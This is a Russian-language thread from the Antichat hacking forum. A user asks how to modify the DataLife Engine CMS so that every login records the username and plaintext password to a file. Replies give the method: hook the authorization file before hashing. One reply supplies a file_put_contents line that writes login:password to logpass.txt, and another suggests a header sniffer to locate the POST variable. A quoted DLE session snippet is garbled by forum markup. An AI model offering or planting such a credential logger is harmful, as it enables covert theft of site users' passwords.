Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Сниффер в движок DLE (https://forum.antichat.xyz/showthread.php?t=439807)

Edward007 12.04.2016 00:39
В общем, суть вопроса такая:

Вот сайт с описанием данной штуки: http://krober.biz/?p=1239

Перед тем как читать дальше, клацните на ссылку выше.

Как сделать так, чтобы при любой авторизации записывался в файл логин и пароль? (Без MD5, то есть чистый пароль)

С этим кодом, получается подобная штука:

http://i.imgur.com/T5xDgRR.png

Я точно не знаю, эти цифры 200: из-за чего они, и должно ли быть так.

Logan22 12.04.2016 21:34
В CMS ищешь файл где происходит авторизация пользователя или админа и записываешь данные до хэширования пароль.

типо так file_put_contents('logpass.txt', $login.':'.$password);

Всё.

Edward007 14.04.2016 05:45
Цитата:
Сообщение от Logan22
Logan22 said:

В CMS ищешь файл где происходит авторизация пользователя или админа и записываешь данные до хэширования пароль.
типо так file_put_contents('logpass.txt', $login.':'.$password);
Всё.
Тк я искал тот самый файл, и чёт не нашел...

blackbox 14.04.2016 10:22
Цитата:
Сообщение от Edward007
Edward007 said:

Тк я искал тот самый файл, и чёт не нашел...
C наскоку не получится, тут нужно хотя бы основы php знать и примерно понимать как устроен движок, чтобы в правильном месте код модифицировать чтобы он сохранял. Так что выводы напрашиваются сами.

LETIFERUM 14.04.2016 13:27
Цитата:
Сообщение от Edward007
Edward007 said:

В общем, суть вопроса такая:
Вот сайт с описанием данной штуки:
http://krober.biz/?p=1239
Перед тем как читать дальше, клацните на ссылку выше.

К
ак сделать так, чтобы при любой авторизации записывался в файл логин и пароль? (Без MD5, то есть чистый пароль)
С этим кодом, получается подобная штука:
http://i.imgur.com/T5xDgRR.png
Я точно не знаю, эти цифры 200: из-за чего они, и должно ли быть так.
200 это результат запроса скорее всего,не?тоже самое как возвращается 404 итд итп

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]///////Конец нашей вставки//////////
[/COLOR][COLOR="#0000BB"]$is_loged_in[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$dle_login_hash[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]SECURE_AUTH_KEY[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#0000BB"]$member_id[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_id'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#0000BB"]sha1[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cmd5_password[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'key'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Ymd"[/COLOR][COLOR="#007700"]));
 if (![/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'dle_user_id'[/COLOR][COLOR="#007700"]] and[/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'dle_user_id'[/COLOR][COLOR="#007700"]]) {
[/COLOR][COLOR="#0000BB"]session_regenerate_id[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'dle_user_id'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'dle_user_id'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'dle_password'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'dle_password'[/COLOR][COLOR="#007700"]];
 }[/COLOR][/COLOR
нафиг эта часть кода тебе?или я не прав?

Edward007 15.04.2016 16:55
Цитата:
Сообщение от blackbox
blackbox said:

C наскоку не получится, тут нужно хотя бы основы php знать и примерно понимать как устроен движок, чтобы в правильном месте код модифицировать чтобы он сохранял. Так что выводы напрашиваются сами.
Основы пыха я и так знаю... Попробую поискать ещё раз.

ol1ver 17.04.2016 03:22
Используй снифер заголовков. Как минимум можно узнать название post переменному сделать её поиск по исходникам, дальше плясать


Время: 14:56